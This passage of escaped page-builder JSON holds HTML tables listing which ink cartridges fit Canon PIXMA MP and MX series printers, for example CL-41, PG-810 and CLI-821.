width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 